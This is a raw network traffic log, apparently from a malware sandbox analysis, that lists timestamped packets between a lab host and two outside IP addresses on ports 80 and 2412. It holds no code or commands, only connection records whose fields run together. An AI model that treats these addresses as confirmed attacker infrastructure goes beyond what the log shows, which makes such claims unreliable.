                                                                                                                                                                                Nov 25, 2024 14:07:36.624881983 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.624938011 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.625562906 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.625622034 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.625665903 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.626466036 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.626569033 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.626615047 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.627448082 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.627553940 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.627594948 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.628426075 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.628511906 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.628557920 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.629414082 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.629475117 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.629518986 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.630342960 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.630409002 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.630450964 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.631458044 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.631494045 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.631530046 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.632255077 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.632329941 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.632375002 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.633238077 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.633249998 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.633294106 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.634247065 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.634346008 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.634392023 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.634993076 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.635093927 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.635134935 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.635950089 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.636037111 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.636073112 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.636840105 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.637056112 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.637104034 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.637772083 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.637881041 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.637929916 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.638705015 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.638804913 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.638856888 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.639659882 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.639786005 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.639830112 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.640506983 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.640597105 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.640645981 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.641454935 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.641541958 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.641586065 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.642466068 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.642538071 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.642589092 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.643294096 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.643358946 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.643399954 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.644197941 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.644227982 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.644289017 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.645178080 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.645267010 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.645306110 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.646110058 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.646183014 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.646236897 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.647288084 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.647389889 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.647434950 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.647829056 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.648407936 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.648530006 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.648574114 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.649444103 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.784677029 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.784734011 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.784837008 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.784992933 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.785002947 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.785048962 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.785482883 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.785650969 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.785696983 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.786272049 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.786412954 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.786456108 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.786911964 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.787017107 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.787061930 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.787599087 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.787707090 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.787745953 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.788321972 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.788461924 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.788503885 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.789036036 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.789159060 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.789199114 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.789819002 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.789918900 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.789963961 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.790441036 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.790492058 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.790532112 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.791160107 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.791388988 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.791433096 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.792084932 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.792294025 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.792337894 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.792920113 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.793020964 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.793061018 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.793442011 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.793551922 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.793596983 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.794007063 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.794125080 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.794168949 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.794676065 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.794805050 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.794850111 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.795547009 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.795718908 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.795773983 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.796350956 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.796448946 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.796493053 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.796833038 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.796946049 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.796992064 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.797530890 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.797677040 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.797724962 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.798269987 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.798314095 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.798361063 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.798928022 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.799045086 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.799089909 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.799643040 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.799756050 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.799798965 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.800352097 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.800477982 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.800519943 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.801035881 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.801161051 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.801220894 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.801806927 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.802059889 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.802110910 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.802460909 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.802575111 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.802618027 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.803172112 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.803297997 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.803343058 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.803906918 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.804029942 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.804073095 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.804614067 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.804722071 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.804763079 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.805283070 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.805422068 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.805465937 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.806016922 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.806139946 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.806183100 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.806714058 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.806847095 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.806898117 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.807430983 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.807569981 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.807610989 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.808130026 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.808243990 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.808285952 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.808976889 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.809230089 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.809279919 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.809670925 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.809787035 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.809830904 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.810249090 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.810367107 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.810421944 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.810992956 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.811057091 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.811101913 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.811832905 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.811898947 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.811943054 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.812371016 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.812488079 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.812531948 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.813090086 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.813205957 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.813247919 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.813831091 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.813867092 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.813911915 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.814508915 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.814733028 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.814774036 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.815196037 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.815342903 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.815387011 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.815948963 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.816055059 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.816102028 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.816772938 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.816896915 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.816939116 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.817353010 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.817833900 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.817879915 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.818142891 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.818253040 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.818291903 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.818938017 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.819003105 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.819046021 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.819655895 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.819709063 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.819757938 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.820470095 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.820590973 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.820636034 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.821295977 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.821374893 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.821417093 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.821710110 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.821752071 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.897171021 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:36.986138105 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.986196041 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.986243010 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.986481905 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.986526012 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.986591101 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.987169981 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.987210989 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.987298965 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.987893105 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.987932920 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.988004923 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.988621950 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.988657951 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.988709927 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.989368916 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.989408970 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.989439011 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.990004063 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.990044117 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.998378038 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:37.017417908 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.017484903 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:37.017558098 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.017764091 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:37.140156031 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.140166998 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.140221119 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:37.140227079 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.140274048 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:37.140300035 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.140346050 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:37.262756109 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.262818098 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:37.262995005 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.263005018 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.263014078 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.263021946 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.263031960 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.263195992 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.263205051 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.263500929 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:37.389903069 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.389914036 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.390028000 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.390553951 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:37.390604973 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:37.511274099 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:43.674101114 CET24124917431.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:43.706763983 CET491742412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:43.826801062 CET24124917431.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:08:13.697664022 CET24124917431.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:08:13.713125944 CET491742412192.168.2.2231.13.224.72
